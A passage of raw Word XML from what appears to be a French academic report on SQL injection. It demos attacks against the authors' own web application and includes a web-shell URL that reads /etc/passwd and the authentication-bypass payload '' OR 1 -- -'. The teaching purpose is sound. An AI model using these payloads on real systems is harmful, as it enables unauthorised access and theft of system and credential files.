        <w:trPr>
          <w:cnfStyle w:val="000000100000"/>
          <w:trHeight w:val="584"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000"/>
            <w:tcW w:w="4286" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D05FD5" w:rsidRPr="00D05FD5" w:rsidRDefault="00D05FD5" w:rsidP="00057EC1">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:spacing w:after="120"/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</w:pP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 xml:space="preserve">Pour </w:t>
            </w:r>
            <w:r w:rsidR="00643938"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>accéder</w:t>
            </w:r>
            <w:r w:rsidRPr="00D05FD5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve"> au fichier créer </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4842" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D05FD5" w:rsidRPr="006A3C77" w:rsidRDefault="00D05FD5" w:rsidP="00057EC1">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:spacing w:after="120"/>
              <w:cnfStyle w:val="000000100000"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006A3C77">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>http://localhost/shell.php?c=cat%20/etc/passwd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="003C016A" w:rsidRPr="00F43AE8" w:rsidRDefault="003E4F3E" w:rsidP="00F43AE8">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="1"/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</w:pPr>
      <w:r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Table</w:t>
      </w:r>
      <w:r w:rsidR="00312435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 xml:space="preserve"> 5.5</w:t>
      </w:r>
      <w:r w:rsidR="00D81050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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D81050" w:rsidRPr="00D81050">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Fonctions et mots clés</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00331692" w:rsidRPr="00D71E78" w:rsidRDefault="004A6BDF" w:rsidP="00E81F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</w:pPr>
      <w:r w:rsidRPr="00D71E78"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  <w:lastRenderedPageBreak/>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00BF30FA" w:rsidRPr="00D71E78"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  <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00D71E78"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  <w:t>rtie 2:</w:t>
      </w:r>
      <w:r w:rsidR="002B4E81" w:rsidRPr="00D71E78"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  <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D71E78"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  <w:t>Exemples</w:t>
      </w:r>
      <w:r w:rsidR="00E81F69" w:rsidRPr="00D71E78"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  <w:t xml:space="preserve"> d’application de SQLIA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00710E40" w:rsidRPr="00E81F69" w:rsidRDefault="00526169" w:rsidP="00D71E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Comme on l’a déjà </w:t>
      </w:r>
      <w:r w:rsidR="00FE5E12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>expliqué</w:t>
      </w:r>
      <w:r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dans le chapitre 3, un point d’injection peut </w:t>
      </w:r>
      <w:r w:rsidR="00F122B8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>être</w:t>
      </w:r>
      <w:r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un champ d’un formulaire ou un </w:t>
      </w:r>
      <w:r w:rsidR="00F122B8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>paramètre</w:t>
      </w:r>
      <w:r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d’une URL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00526169" w:rsidRPr="00E81F69" w:rsidRDefault="00526169" w:rsidP="00D71E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Dans cette partie, on va donner quelques exemples sur l’application de l’injection SQL </w:t>
      </w:r>
      <w:r w:rsidR="00BF30FA">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>sur une application W</w:t>
      </w:r>
      <w:r w:rsidR="00341258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eb que nous avons </w:t>
      </w:r>
      <w:r w:rsidR="00F122B8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>créé</w:t>
      </w:r>
      <w:r w:rsidR="00341258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>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F122B8" w:rsidRPr="00E81F69" w:rsidRDefault="00F122B8" w:rsidP="00D71E78">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste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jc w:val="both"/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</w:pPr>
      <w:r w:rsidRPr="00E81F69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Injecter un champ d’un formulaire :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00681919" w:rsidRPr="00E81F69" w:rsidRDefault="00FE5E12" w:rsidP="00D71E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La figure suivante montre </w:t>
      </w:r>
      <w:r w:rsidR="00681919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>une page Web contenant un formulaire d’</w:t>
      </w:r>
      <w:r w:rsidR="00EA7C30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authentification. </w:t>
      </w:r>
      <w:r w:rsidR="00EA7C30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>Essayant</w:t>
      </w:r>
      <w:r w:rsidR="00681919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maintenant d’injecter les champs nom d’utilisateur et </w:t>
      </w:r>
      <w:r w:rsidR="005B1E5E" w:rsidRPr="00E81F69">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>mot de passe.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B1E5E" w:rsidRDefault="001F61F8" w:rsidP="005B1E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  <w:r w:rsidRPr="001F61F8"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cteur droit avec flèche 6" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;margin-left:167.25pt;margin-top:137.25pt;width:62.25pt;height:97.4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K1r6wEAABEEAAAOAAAAZHJzL2Uyb0RvYy54bWysU0uOEzEQ3SNxB8t70p0eJoEonVlk+CwQ&#10;RAMcwOMupy35p7InndyIe3Axyu6eBgHSSIiNZbv8XtV7Vd7enK1hJ8CovWv5clFzBk76Trtjy79+&#10;efviFWcxCdcJ4x20/AKR3+yeP9sOYQON773pABmRuLgZQsv7lMKmqqLswYq48AEcBZVHKxId8Vh1&#10;KAZit6Zq6npVDR67gF5CjHR7Owb5rvArBTJ9UipCYqblVFsqK5b1Pq/Vbis2RxSh13IqQ/xDFVZo&#10;R0lnqluRBHtA/QeV1RJ99CotpLeVV0pLKBpIzbL+Tc3nXgQoWsicGGab4v+jlR9PB2S6a/mKMycs&#10;tWjvnSPf4AFZh14nJk4gmTLfv1FT2CpbNoS4IeTeHXA6xXDArP+s0NJbHd7TNBRHSCM7F8Mvs+Fw&#10;TkzS5fp1fb1+yZmk0LK5Wq+W15m+GnkyX8CY3oG3LG9aHhMKfezTVKPHMYc4fYhpBD4CMti4vCah&#10;zRvXsXQJpE4g+mFKkuNV1jJWX3bpYmDE3oEiY6jKq6KjjCTsDbKToGESUoJLzcxErzNMaWNmYP00&#10;cHqfoVDGdQY3T4NnRMnsXZrBVjuPfyNI5+VUshrfPzow6s4W3PvuUvparKG5Kw2Z/kge7F/PBf7z&#10;J+9+AAAA//8DAFBLAwQUAAYACAAAACEAG6HVV+EAAAALAQAADwAAAGRycy9kb3ducmV2LnhtbEyP&#10;zU7DMBCE70i8g7VI3KhDk6Y0xKkQ4kfQ9tCWB3DjJQnE6yh2m/D2bE9wm9F+mp3Jl6NtxQl73zhS&#10;cDuJQCCVzjRUKfjYP9/cgfBBk9GtI1Twgx6WxeVFrjPjBtriaRcqwSHkM62gDqHLpPRljVb7ieuQ&#10;+PbpeqsD276SptcDh9tWTqMolVY3xB9q3eFjjeX37mgVpAGHTTl/WW2f1mv3Ve3j7u39Vanrq/Hh&#10;HkTAMfzBcK7P1aHgTgd3JONFqyCOkxmjCqbzs2AimS143YFFukhAFrn8v6H4BQAA//8DAFBLAQIt&#10;ABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10u&#10;eG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5y&#10;ZWxzUEsBAi0AFAAGAAgAAAAhANSYrWvrAQAAEQQAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9E&#10;b2MueG1sUEsBAi0AFAAGAAgAAAAhABuh1VfhAAAACwEAAA8AAAAAAAAAAAAAAAAARQQAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAABTBQAAAAA=&#10;" strokecolor="#ed7d31 [3205]" strokeweight="1.5pt">
            <v:stroke endarrow="open" joinstyle="miter"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r w:rsidRPr="001F61F8"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</w:rPr>
        <w:pict>
          <v:line id="Connecteur droit 5" o:spid="_x0000_s1030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3.5pt,105.75pt" to="253.5pt,1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Lmy8gEAAE8EAAAOAAAAZHJzL2Uyb0RvYy54bWysVE2P2yAQvVfqf0DcGzvZZltZcfaQVXvp&#10;R9Rtf8AshhgJAxrY2Pn3HSDrRN1qD1UvGGbmDe89wJu7aTDsKDFoZ1u+XNScSStcp+2h5b9+fnr3&#10;kbMQwXZgnJUtP8nA77Zv32xG38iV653pJDJqYkMz+pb3MfqmqoLo5QBh4by0lFQOB4i0xEPVIYzU&#10;fTDVqq5vq9Fh59EJGQJF70uSb3N/paSI35UKMjLTcuIW84h5fExjtd1Ac0DwvRZnGvAPLAbQljad&#10;W91DBPaE+kWrQQt0wam4EG6onFJayKyB1CzrP9Q89OBl1kLmBD/bFP5fW/HtuEemu5avObMw0BHt&#10;nLXkm3xC1qHTka2TS6MPDRXv7B7Pq+D3mCRPCof0JTFsys6eZmflFJkoQUHR93Vdr7Pp1QXnMcTP&#10;0g0sTVputE2aoYHjlxBpLyp9LklhmU+VUmlxMG5kCET/9mZd1xmX747cGWRHoFMHIaSNq5KC+NV1&#10;Jb78QIDzBQDjeyjhRPGZ4dwpk0h75ckVgyrZUozIs3gyMvEy9odUZCtJv3mNVJGXqxNMaWNm4Ktq&#10;CvBcf7FlBp/1pmf00ooCLjIIkXd2Ns7gQVuHf6Mdp2W6C3QiqtTT/Ep3mj667pSvSE7QrS3elReW&#10;nsX1OsMv/4HtbwAAAP//AwBQSwMEFAAGAAgAAAAhACPbq8DfAAAACwEAAA8AAABkcnMvZG93bnJl&#10;di54bWxMj0FLxDAQhe+C/yGM4M1Ns1ortekigiKC6K6K19lmbItNUptsN/57Rzzocd483vtetUp2&#10;EDNNofdOg1pkIMg13vSu1fDyfHNyASJEdAYH70jDFwVY1YcHFZbG792a5k1sBYe4UKKGLsaxlDI0&#10;HVkMCz+S49+7nyxGPqdWmgn3HG4Hucyyc2mxd9zQ4UjXHTUfm53VkIqn9u12He7VY7oLD6cKX7P5&#10;U+vjo3R1CSJSin9m+MFndKiZaet3zgQxaMizgrdEDUulchDs+FW2rBRnOci6kv831N8AAAD//wMA&#10;UEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5&#10;cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3Jl&#10;bHMvLnJlbHNQSwECLQAUAAYACAAAACEApsC5svIBAABPBAAADgAAAAAAAAAAAAAAAAAuAgAAZHJz&#10;L2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAI9urwN8AAAALAQAADwAAAAAAAAAAAAAAAABMBAAA&#10;ZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAFgFAAAAAA==&#10;" strokecolor="#ed7d31 [3205]" strokeweight="1.5pt">
            <v:stroke joinstyle="miter"/>
          </v:line>
        </w:pict>
      </w:r>
      <w:r w:rsidRPr="001F61F8"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</w:rPr>
        <w:pict>
          <v:line id="Connecteur droit 4" o:spid="_x0000_s1029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5pt,137.25pt" to="253.5pt,1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j8e9QEAAE8EAAAOAAAAZHJzL2Uyb0RvYy54bWysVE1z2yAQvXem/4HhXkt2nKTVWM7BmfbS&#10;D0/b/ACCwGIGWAaIJf/7LqDIniaTQ6cXBLv7dvc9Fm3uRqPJUfigwLZ0uagpEZZDp+yhpQ+/P3/4&#10;SEmIzHZMgxUtPYlA77bv320G14gV9KA74QkmsaEZXEv7GF1TVYH3wrCwACcsOiV4wyIe/aHqPBsw&#10;u9HVqq5vqgF85zxwEQJa74uTbnN+KQWPP6QMIhLdUuwt5tXn9TGt1XbDmoNnrld8aoP9QxeGKYtF&#10;51T3LDLy5NWLVEZxDwFkXHAwFUipuMgckM2y/ovNr545kbmgOMHNMoX/l5Z/P+49UV1L15RYZvCK&#10;dmAt6iaePOk8qEjWSaXBhQaDd3bvp1Nwe58oj9Kb9EUyZMzKnmZlxRgJR+PtevXpGvXnz67qjHM+&#10;xC8CDEmblmplE2fWsOPXELEWhj6HJLPIt4qudDhoGIhn2P7N1XVdZ1yeHbHTnhwZ3jrjXNi4Ki4W&#10;v0FX7MtbBEwDwLTrWTGv0ZitWHbOlJtItfLmooMqyVKEyLt40iL1pe1PIVFWpH71VlOFXo5OMKm0&#10;noFvsinAKf4sywye+KZn9FKKAi40EJErg40z2CgL/rW247hMs4DSyBKP+wveafsI3SmPSHbg1Bbt&#10;ygtLz+LynOHn/8D2DwAAAP//AwBQSwMEFAAGAAgAAAAhANKwtzHfAAAACwEAAA8AAABkcnMvZG93&#10;bnJldi54bWxMj1FLxDAQhN8F/0NYwTcv6Z1ntTY9RFBEEL1T8XWvWdtis6lNrhf/vREEfdzZYeab&#10;chVtLyYafedYQzZTIIhrZzpuNLw835ycg/AB2WDvmDR8kYdVdXhQYmHcntc0bUIjUgj7AjW0IQyF&#10;lL5uyaKfuYE4/d7daDGkc2ykGXGfwm0v50qdSYsdp4YWB7puqf7Y7KyGmD81b7drf589xjv/sMjw&#10;VU2fWh8fxatLEIFi+DPDD35Chyoxbd2OjRe9hsWFSluChnl+ugSRHEuVJ2X7q8iqlP83VN8AAAD/&#10;/wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50&#10;X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAAvAQAA&#10;X3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAFx4/HvUBAABPBAAADgAAAAAAAAAAAAAAAAAuAgAA&#10;ZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEA0rC3Md8AAAALAQAADwAAAAAAAAAAAAAAAABP&#10;BAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAFsFAAAAAA==&#10;" strokecolor="#ed7d31 [3205]" strokeweight="1.5pt">
            <v:stroke joinstyle="miter"/>
          </v:line>
        </w:pict>
      </w:r>
      <w:r w:rsidRPr="001F61F8"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</w:rPr>
        <w:pict>
          <v:line id="Connecteur droit 3" o:spid="_x0000_s1028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5pt,105.75pt" to="195pt,1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ahq8gEAAE8EAAAOAAAAZHJzL2Uyb0RvYy54bWysVE2P2yAQvVfqf0DcGztJd1tZcfaQVXvp&#10;R9RtfwCLIUbCDBrY2Pn3HSDrRN1qD1UvGGbmDe89wJu7abDsqDAYcC1fLmrOlJPQGXdo+a+fn959&#10;5CxE4TphwamWn1Tgd9u3bzajb9QKerCdQkZNXGhG3/I+Rt9UVZC9GkRYgFeOkhpwEJGWeKg6FCN1&#10;H2y1quvbagTsPIJUIVD0viT5NvfXWsn4XeugIrMtJ24xj5jHxzRW241oDih8b+SZhvgHFoMwjjad&#10;W92LKNgTmhetBiMRAui4kDBUoLWRKmsgNcv6DzUPvfAqayFzgp9tCv+vrfx23CMzXcvXnDkx0BHt&#10;wDnyTT0h6xBMZOvk0uhDQ8U7t8fzKvg9JsmTxiF9SQybsrOn2Vk1RSZLUFL0fV3XN9n06oLzGOJn&#10;BQNLk5Zb45Jm0YjjlxBpLyp9LklhlU+VUmlxsDAyFET/dn1T1xmX747aWWRHQacupFQurkpKxK/Q&#10;lfjyAwHOF0BY34sSThSfGc6dMom0V55cMaiSLcWIPIsnqxIv634oTbaS9PVrpIq8XJ1g2lg7A19V&#10;U4Dn+ostM/isNz2jl1YUcJFBiLwzuDiDB+MA/0Y7Tst0F+hEdKmn+ZXuNH2E7pSvSE7QrS3elReW&#10;nsX1OsMv/4HtbwAAAP//AwBQSwMEFAAGAAgAAAAhAJ4J6EvgAAAACwEAAA8AAABkcnMvZG93bnJl&#10;di54bWxMj8FOwzAQRO9I/IO1SNyonZbSEuJUCAmEkBC0BXHdxiaJiNchdlPz9yziAMedHc28KVbJ&#10;dWK0Q2g9acgmCoSlypuWag0v29uzJYgQkQx2nqyGLxtgVR4fFZgbf6C1HTexFhxCIUcNTYx9LmWo&#10;GuswTHxviX/vfnAY+RxqaQY8cLjr5FSpC+mwJW5osLc3ja0+NnunIS2e67e7dXjIntJ9eJxl+KrG&#10;T61PT9L1FYhoU/wzww8+o0PJTDu/JxNEp2F2qXhL1DDNsjkIdvwqO1YW53OQZSH/byi/AQAA//8D&#10;AFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9U&#10;eXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9y&#10;ZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhABsBqGryAQAATwQAAA4AAAAAAAAAAAAAAAAALgIAAGRy&#10;cy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAJ4J6EvgAAAACwEAAA8AAAAAAAAAAAAAAAAATAQA&#10;AGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAABZBQAAAAA=&#10;" strokecolor="#ed7d31 [3205]" strokeweight="1.5pt">
            <v:stroke joinstyle="miter"/>
          </v:line>
        </w:pict>
      </w:r>
      <w:r w:rsidRPr="001F61F8"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</w:rPr>
        <w:pict>
          <v:line id="Connecteur droit 2" o:spid="_x0000_s1027" style="position:absolute;flip:x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5pt,105.75pt" to="253.5pt,10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mN7/QEAAFkEAAAOAAAAZHJzL2Uyb0RvYy54bWysVE1v2zAMvQ/YfxB0X+y4X5sRp4cU2w77&#10;CLrtB6iyFAuQREFSY+ffj5JcN1iHHoZdBIrkI/meaG9uJ6PJUfigwHZ0vaopEZZDr+yho79+fnz3&#10;npIQme2ZBis6ehKB3m7fvtmMrhUNDKB74QkWsaEdXUeHGF1bVYEPwrCwAicsBiV4wyJe/aHqPRux&#10;utFVU9fX1Qi+dx64CAG9dyVIt7m+lILH71IGEYnuKM4W8+nz+ZDOarth7cEzNyg+j8H+YQrDlMWm&#10;S6k7Fhl59OpFKaO4hwAyrjiYCqRUXGQOyGZd/8Hmx8CcyFxQnOAWmcL/K8u/HfeeqL6jDSWWGXyi&#10;HViLuolHT3oPKpImqTS60GLyzu79fAtu7xPlSXpDpFbuMy5AFgFpkSlrfFo0FlMkHJ03l82HK3wJ&#10;/hSqSoVUyfkQPwkwJBkd1com9qxlxy8hYldMfUpJbpHfF0PpctAwEs+QyPXFVV1nXN4isdOeHBm+&#10;P+Nc2NiUEItfoS/+9Q0C5lVg2g2suC/Rmb3YdqmUh0i9snE2QZUEKpJkK560SHNpey8kCozUL14b&#10;qtDL2QkmldYL8FU2BTjnP8uygGe+6YN6KUUBFxqIyJ3BxgVslAX/t7HjtE5bgdLIko/2Ge9kPkB/&#10;ysuSA7i/RbvyraUP5Pye4c9/hO1vAAAA//8DAFBLAwQUAAYACAAAACEAM26CUt4AAAALAQAADwAA&#10;AGRycy9kb3ducmV2LnhtbEyPwU7DMBBE70j8g7VI3KidllAa4lQIgUDiAoUPcONtHBqvo9hpA1/P&#10;IiHBcWdHM2/K9eQ7ccAhtoE0ZDMFAqkOtqVGw/vbw8U1iJgMWdMFQg2fGGFdnZ6UprDhSK942KRG&#10;cAjFwmhwKfWFlLF26E2chR6Jf7sweJP4HBppB3PkcN/JuVJX0puWuMGZHu8c1vvN6Ln3ySzoedy3&#10;y9XOPV6+3H/lXn5ofX423d6ASDilPzP84DM6VMy0DSPZKDoNi5XiLUnDPMtyEOzI1ZKV7a8iq1L+&#10;31B9AwAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABb&#10;Q29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAA&#10;AAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAMw6Y3v9AQAAWQQAAA4AAAAAAAAAAAAA&#10;AAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhADNuglLeAAAACwEAAA8AAAAAAAAA&#10;AAAAAAAAVwQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAABiBQAAAAA=&#10;" strokecolor="#ed7d31 [3205]" strokeweight="1.5pt">
            <v:stroke joinstyle="miter"/>
          </v:line>
        </w:pict>
      </w:r>
      <w:r w:rsidR="005B1E5E"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  <w:lang w:val="fr-FR" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5604510" cy="2895089"/>
            <wp:effectExtent l="0" t="0" r="0" b="63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812" cy="2893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122B8" w:rsidRDefault="00DE46D0" w:rsidP="00F122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  <w:r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  <w:lang w:val="fr-FR" w:eastAsia="fr-F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1228090</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>85725</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1247775" cy="895350"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21140"/>
                <wp:lineTo x="21435" y="21140"/>
                <wp:lineTo x="21435" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight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122B8" w:rsidRDefault="00F122B8" w:rsidP="00F122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F122B8" w:rsidRDefault="00F122B8" w:rsidP="00F122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F122B8" w:rsidRDefault="00F122B8" w:rsidP="00F122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F122B8" w:rsidRDefault="00F122B8" w:rsidP="00F122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F122B8" w:rsidRDefault="00F122B8" w:rsidP="00F122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EA7C30" w:rsidRDefault="00EA7C30" w:rsidP="00EA7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F122B8" w:rsidRPr="00A35012" w:rsidRDefault="00EA7C30" w:rsidP="00D86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jc w:val="center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A35012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Figure</w:t>
      </w:r>
      <w:r w:rsidR="0005296C" w:rsidRPr="00A35012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 xml:space="preserve"> 5.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A35012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proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D31557">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>by</w:t>
      </w:r>
      <w:r w:rsidR="0005296C" w:rsidRPr="00A35012">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>passer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0005296C" w:rsidRPr="00A35012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une </w:t>
      </w:r>
      <w:r w:rsidR="00A35012" w:rsidRPr="00A35012">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>authentification</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A35012" w:rsidRDefault="002015B4" w:rsidP="00D866CB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="10992"/>
          <w:tab w:val="left" w:pos="11057"/>
          <w:tab w:val="left" w:pos="1148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A35012">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="00D4503E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> OR</w:t>
      </w:r>
      <w:r w:rsidRPr="00A35012">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A35012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est une tautologie et le </w:t>
      </w:r>
      <w:r w:rsidRPr="00A35012">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>-- -</w:t>
      </w:r>
      <w:r w:rsidRPr="00A35012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sert à commenter le reste de la requête.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002015B4" w:rsidRPr="00A35012" w:rsidRDefault="00A35012" w:rsidP="00D86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A35012">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="002015B4" w:rsidRPr="00A35012">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>assant maintenant à la figure suivante qui montre le résultat de l’exécution de la requête précédente.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A35012" w:rsidRDefault="00A35012" w:rsidP="00A35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color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A35012" w:rsidRDefault="00A35012" w:rsidP="00A350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color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0005296C" w:rsidRDefault="0005296C" w:rsidP="000529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color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0005296C" w:rsidRDefault="0005296C" w:rsidP="000529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color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0005296C" w:rsidRPr="00D31557" w:rsidRDefault="005A7E2B" w:rsidP="00D86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jc w:val="center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D31557">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
